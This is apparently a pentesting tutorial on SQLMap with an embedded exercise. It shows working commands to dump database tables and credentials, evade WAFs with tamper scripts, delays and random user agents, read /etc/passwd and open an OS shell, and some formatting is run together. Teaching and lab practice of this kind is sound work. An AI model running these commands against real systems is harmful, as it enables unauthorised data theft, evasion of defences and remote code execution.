SQLMap is the most powerful and comprehensive open-source tool for automated detection and exploitation of SQL injection (SQLi) vulnerabilities. It supports 6 types of injections: Boolean-based blind, Time-based blind, Error-based, UNION query-based, Stacked queries, and Out-of-band.
-r)While you can pass URLs (-u) and cookies (--cookie) manually, the industry standard is to intercept the request with BurpSuite, save it to a .txt file, and pass it to SQLMap. This automatically parses all headers, cookies, and POST data.
# 1. In BurpSuite, intercept the vulnerable request.
# 2. Right-click -> "Copy to file" (save as request.txt).
# 3. Launch SQLMap using the file:
sqlmap -r request.txt --dbsOnce the injection is confirmed, map the database structure to find valuable data.
# Enumerate all databases:
sqlmap -r request.txt --dbs
# Get current user, current DB, and check for DBA privileges:
sqlmap -r request.txt --current-user --current-db --is-dba
# Enumerate tables in a specific database (-D):
sqlmap -r request.txt -D dvwa --tables
# Enumerate columns in a specific table (-T):
sqlmap -r request.txt -D dvwa -T users --columns
# Dump the entire table:
sqlmap -r request.txt -D dvwa -T users --dump
# Dump specific columns only (-C):
sqlmap -r request.txt -D dvwa -T users -C user,password --dumpYou intercepted a request to an admin panel and saved it as request.txt. A WAF is configured to block injections containing whitespace. Build the sqlmap command to use the request file, dump the admin_creds table from the corp_db database, and use the space2comment tamper script to evade the firewall.
Web Application Firewalls (WAF) like Cloudflare will block default SQLMap payloads. We must tune the scanner to remain undetected.
# Add a delay between requests (in seconds) to avoid Rate Limiting:
sqlmap -r request.txt --delay=2
# Use a random, real browser User-Agent:
sqlmap -r request.txt --random-agent
# Use Tamper scripts to obfuscate payloads.
# space2comment.py replaces whitespaces with comments (/**/) to evade simple filters:
sqlmap -r request.txt --tamper=space2comment
# Increase scan aggressiveness (Level 1-5, Risk 1-3).
# Level 3+ injects into HTTP headers (User-Agent, Referer).
sqlmap -r request.txt --level=3 --risk=2If the DB user is root or DBA, and the server has file read/write misconfigurations (like FILE priv in MySQL or xp_cmdshell in MSSQL), SQLMap can jump from the database to the underlying Operating System.
# Read a file from the victim server:
sqlmap -r request.txt --file-read="/etc/passwd"
# The Holy Grail! Pop an interactive OS shell (RCE):
sqlmap -r request.txt --os-shell